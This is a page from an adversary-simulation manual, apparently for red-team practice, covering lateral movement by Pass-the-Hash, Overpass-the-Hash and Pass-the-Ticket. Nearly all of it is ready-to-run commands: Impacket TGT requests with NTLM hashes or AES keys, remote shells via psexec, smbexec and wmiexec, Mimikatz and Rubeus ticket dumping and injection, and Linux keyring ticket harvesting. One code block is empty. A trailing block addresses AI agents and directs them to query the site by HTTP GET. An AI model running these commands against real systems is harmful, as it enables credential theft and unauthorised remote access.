# Use Alternate Authentication Material

## Application Access Token

## Pass the Hash

### Overpass The Hash/Pass The Key (PTK)

#### Impacket

Request the TGT with hash

```
python getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>
```

Request the TGT with aesKey (more secure encryption, probably more stealth due is the used by default by Microsoft)

```
python getTGT.py <domain_name>/<user_name> -aesKey <aes_key>
```

Request the TGT with password

```
python getTGT.py <domain_name>/<user_name>:[password]
```

Set the TGT for impacket use

```
export KRB5CCNAME=<TGT_ccache_file>
```

Execute remote commands with any of the following by using the TGT

```
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
```

```
python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
```

```
python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
```

#### Rubeus and PsExec

Ask and inject the ticket

```
.\Rubeus.exe asktgt /domain:<domain_name> /user:<user_name> /rc4:<ntlm_hash> /ptt
```

Execute a cmd in the remote machine

```
.\PsExec.exe -accepteula \\<remote_hostname> cmd
```

## Pass the Ticket

### Pass The Ticket (PTT)

#### Harvest tickets from Linux

* Check type and location of tickets:

  ```
  grep default_ccache_name /etc/krb5.conf
  ```
* If none return, default is `FILE:/tmp/krb5cc_%{uid}`.
* In case of file tickets, you can copy-paste (if you have permissions) for use them.
* In case of being `*KEYRING*` tickets, you can use [tickey](https://github.com/TarlogicSecurity/tickey) to get them:

```
cp tickey /tmp/tickey
```

```
/tmp/tickey -i
```

#### Harvest tickets from Windows

With [Mimikatz](https://github.com/gentilkiwi/mimikatz):

```
mimikatz # sekurlsa::tickets /export
```

With [Rubeus](https://github.com/GhostPack/Rubeus) in Powershell:

```
.\Rubeus dump
```

After dump with Rubeus tickets in base64, to write the in a file

```
```

To convert tickets between Linux/Windows format with [ticket\_converter.py](https://github.com/Zer1t0/ticket_converter):

```
python ticket_converter.py ticket.kirbi ticket.ccache
```

```
python ticket_converter.py ticket.ccache ticket.kirbi
```

#### Using ticket in Linux:

Set the ticket for impacket use

```
export KRB5CCNAME=<TGT_ccache_file_path>
```

Execute remote commands with any of the following by using the TGT

```
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
```

```
python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
```

```
python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
```

#### Using ticket in Windows

Inject ticket with [Mimikatz](https://github.com/gentilkiwi/mimikatz):

```
mimikatz # kerberos::ptt <ticket_kirbi_file>
```

Inject ticket with [Rubeus](https://github.com/GhostPack/Rubeus):

```
.\Rubeus.exe ptt /ticket:<ticket_kirbi_file>
```

Execute a cmd in the remote machine with [PsExec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec):

```
.\PsExec.exe -accepteula \\<remote_hostname> cmd
```

## Web Session Cookie


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://jam-session.gitbook.io/joined-adversary-simulation-manual/lateral-movement/use-alternate-authentication-material.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.